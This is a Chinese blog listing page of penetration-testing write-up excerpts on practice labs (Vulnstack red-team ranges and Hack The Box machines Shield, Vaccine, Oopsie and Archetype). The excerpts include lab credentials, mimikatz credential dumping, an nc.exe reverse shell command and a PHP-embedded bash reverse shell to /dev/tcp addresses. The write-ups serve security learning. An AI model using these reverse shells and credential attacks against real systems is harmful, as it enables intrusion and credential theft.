
渗透测试
文章平均质量分 68
Y4tacker
关于我:Web安全、Java安全研究弟中弟
学校:四川大学(2019级)
写给自己:宁静致远,淡泊明志
展开
-
[渗透测试]ATT&CK实战 | Vulnstack 红队(一)
文章目录写在前面拿下webshell简单信息搜集CS上线继续信息搜集提权攻击域-接管整个域完结撒花写在前面无聊,再玩一个靶场,顺便记录下,也学了一些新东西拿下webshell打开网站以后发现是个php探针,没啥意义,除了试一试弱口令同时使用dirsearch扫描发现有phpmyadmin,尝试为弱口令root\root查询SHOW VARIABLES LIKE "%SECURE%"发现配置未开启,那么不能使用into outfile写马进去原创 2021-12-07 11:08:23 · 2132 阅读 · 2 评论 -
[渗透测试]ATT&CK实战 | Vulnstack 红队(二)
文章目录环境来源为什么写这篇文章配置nmap扫描启动smbserver共享文件服务打爆weblogic提权使用 procdump64+mimikatz 获取 win 用户明文密生成管理帐号密码用户凭证-连接域控服务器-反弹域控 shel参考文章环境来源来源于https://mp.weixin.qq.com/s/uLlWJdcAc6MmUyuruHygNA,尊重人家作者,还是自己去问人家要吧为什么写这篇文章给一些不必要细节删除,以及一些自己觉得细节的补充配置nmap扫描常用端口是开放状态1原创 2021-12-06 17:25:14 · 2021 阅读 · 2 评论 -
[渗透测试]HTB靶机-Shield
文章目录ShieldShield扫描文件神奇的出来个这个扫描发现存在wordpress站点用admin/P@s5w0rd!成功登陆后台发现存在漏洞的后面发现可以直接用msf来利用,完美的换个目录方便我上传文件接下来cd C:/inetpub/wwwroot/wordpress/wp-content/uploads刚刚发现文件放错地方了重新来一下执行execute -f nc.exe -a "-e cmd.exe 10.10.14.8 1234"成功接收到shell原创 2021-07-23 14:38:35 · 437 阅读 · 0 评论 -
[渗透测试]HTB靶机-Vaccine
文章目录VaccineVaccine首先nmap -sC -sV 10.10.10.46发现前台是一个登陆界面,尝试ftp登录ftpuser / mc@F1l3ZilL4输入dir拿到源码尝试下载通过爆破得到密码741852963拿到源码拿到2cb42f8734ea607eefed3b70af13bbd3去尝试md5撞库成功进入后台发现存在sql注入这里很容易猜测到如果是只通过sql那一定是通过udf提权,直接sqlmap一把梭输入bash -c 'bash -原创 2021-07-22 18:59:43 · 847 阅读 · 5 评论 -
[渗透测试]HTB靶机-Oopsie
文章目录OopsieOopsie首先跳过nmap扫描的过程,现在我们直接开始日,发现了http://10.10.10.28/cdn-cgi/login/admin.php用admin和MEGACORP_4dm1n!!这里存在一个水平越权的漏洞,具体不给出分析了,看cookie都懂垂直越权后发现存在文件上传点这里来反弹一个shell<?phpexec("/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.166/4444 0<原创 2021-07-22 14:51:40 · 680 阅读 · 5 评论 -
[渗透测试]HTB靶机-Archetype
文章目录工具介绍smbclientpsexecArchetype工具介绍smbclientSmbclient(samba client)是基于SMB协议的,用于存取共享目标的客户端程序。参数:网络资源 网络资源的格式为//服务器名称/资源分享名称。密码 输入存取网络资源所需的密码。-B 传送广播数据包时所用的IP地址。-d< 排错层级> 指定记录文件所记载事件的详细程度。-E 将信息送到标准错误输出设备。-h 显示帮助。-i< 范围> 设置NetBIOS名称范围原创 2021-07-17 07:14:26 · 1353 阅读 · 3 评论